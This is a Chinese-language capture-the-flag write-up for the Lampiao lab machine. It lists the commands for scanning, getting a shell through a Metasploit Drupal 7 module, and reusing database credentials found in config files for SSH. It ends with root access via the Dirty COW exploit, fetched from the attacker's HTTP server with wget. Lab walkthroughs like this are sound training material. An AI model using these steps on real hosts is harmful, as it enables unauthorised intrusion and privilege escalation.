Nmap –sS –p 1-65535 192.168.231.1-255 (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip)
我们可以看到到靶机开放了22(ssh),80(http),1898端口,
可以通过dirmap 扫描目录
Python3 dirmap.py –i http:192.168.231.139 –lcf
先访问80端口看一下网站长啥样,有没有可以利用的点,发现是作者在鼓励我,难道作者也知道我很菜吗!
再尝试1898端口,通过访问1898下的robots.txt文件可以得知里边存在changelog.txt
可以通过changelog日志查看到使用的cms是drupal7.45
第二部:利用漏洞渗透
Kali msf ,Search drupal,Use 相应的模块,Show options
Set rhost 192.168.231.139
Set rport 1898
Exploite
直接就getshell
Python –c ‘import pty;pty.spawn(“/bin/bash”)
得到一个交互界面
进一步信息收集 ls查看一下都有啥文件
这个时候肯定比目录扫描扫出来的文件要多
Sites目录下保存着默认配置, Cd /home 目录下,ls查看目录中存在拿些用户
结果就发现了一个用户名为tiago的用户
通过查看sites里的文件竟然发现了数据的账户和密码
前边信息收集我们得知,靶机开放着22端口,可以尝试ssh登录下
Ssh tiago@192.168.231.139
登陆完成后发现权限仍然也不高
第三步:提权获取flag那就该提权啦
Uname-a 查看linux版本是否可以用脏牛提权 发现是可以的
Kali自带脏牛exp
攻击机searchsploite dirty
会发现有一个40847.cpp的文件
Locate /linux/local/40847.cpp 查看exp的完整路径,复制一份到root目录下
本机在root目录下搭建一个http服务
Python3 –m http.server
靶机上执行
Wget http:192.168.231.129:8000/40847.cpp (最好切换到/tmp目录下执行)
然后编译一下cpp文件 最后脏牛就生成啦
直接运行,运行完成后是root权限啦,ls查看下会发现flag
到这里就结束了
lampiao靶场整体难度特别简单,但是身为菜鸡的我还是看了网上大佬们的writeup,如果有不对的地方还请多多指教.
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)